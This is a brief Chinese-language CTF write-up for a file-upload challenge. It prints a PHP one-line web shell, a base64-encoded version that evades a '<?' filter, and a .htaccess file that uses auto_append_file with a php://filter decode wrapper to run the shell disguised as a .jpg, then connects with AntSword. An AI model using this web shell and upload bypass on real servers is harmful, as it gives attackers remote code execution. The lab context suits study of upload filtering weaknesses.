polar 上传

发布时间 2024-01-06 09:03:09作者: adotdot

直接上传一个一句话木马文件:<?php eval($_POST[c]); ?>
经过上传测试发现,这题过滤掉了<?,这样正常的一句话木马就没法上传,所以对一句话木马进行base64编译PD9waHAgZXZhbCgkX1BPU1RbY10pOyA/Pg==,同时发现可以上传.htaccess文件去解析上传的木马,然后再用蚁剑进行连接,最终获得flag

.htaccess文件:
AddType application/x-httpd-php .jpg
php_value auto_append_fi\
le "php://filter/convert.base64-decode/resource=shell.jpg"